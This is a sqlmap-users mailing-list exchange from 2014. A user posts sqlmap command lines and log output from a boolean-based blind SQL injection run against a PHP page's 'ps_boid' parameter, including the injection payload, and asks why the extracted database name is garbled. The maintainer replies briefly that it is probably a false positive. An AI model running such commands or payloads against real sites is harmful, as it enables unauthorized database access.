Re: [sqlmap-users] SQLMap extracts weird chars
From: Miroslav S. <mir...@gm...> - 2014-05-03 21:09:44
Hi.

Most probably a false positive.

Bye

On Sat, May 3, 2014 at 11:02 PM, Dev <124...@qq...> wrote:

> I can't figure out why this happens
>
> root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149"
> --current-db
>
> sqlmap/1.0-dev-b54651b - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [*] starting at 05:58:05
>
> [05:58:05] [INFO] resuming back-end DBMS 'mysql'
> [05:58:05] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: ps_boid
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: ps_db=notice&ps_boid=149) AND 4099=4099 AND (2004=2004
> ---
> [05:58:14] [INFO] the back-end DBMS is MySQL
> web application technology: PHP 4.4.9, Apache
> back-end DBMS: MySQL 4
> [05:58:14] [INFO] fetching current database
> [05:58:14] [INFO] resumed: \\?9e\\?9e\\?9e\\?9e\\?9e\\?9e\\?9e
> current database: '\?9e\?9e\?9e\?9e\?9e\?9e\?9e'
> [05:58:14] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/www.net'
>
> [*] shutting down at 05:58:14
>
> root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149"
> --current-db
>
> sqlmap/1.0-dev-b54651b - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 05:59:17
>
> [05:59:17] [INFO] resuming back-end DBMS 'mysql'
> [05:59:17] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: ps_boid
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: ps_db=notice&ps_boid=149) AND 4099=4099 AND (2004=2004
> ---
> [05:59:18] [INFO] the back-end DBMS is MySQL
> web application technology: PHP 4.4.9, Apache
> back-end DBMS: MySQL 4
> [05:59:18] [INFO] fetching current database
> [05:59:18] [INFO] resumed: \\?9e\\?9e\\?9e\\?9e\\?9e\\?9e\\?9e
> current database: '\?9e\?9e\?9e\?9e\?9e\?9e\?9e'
> [05:59:18] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/www.net'
>
> [*] shutting down at 05:59:18
>
> root@pk:~#

-- 
Miroslav Stampar
http://about.me/stamparm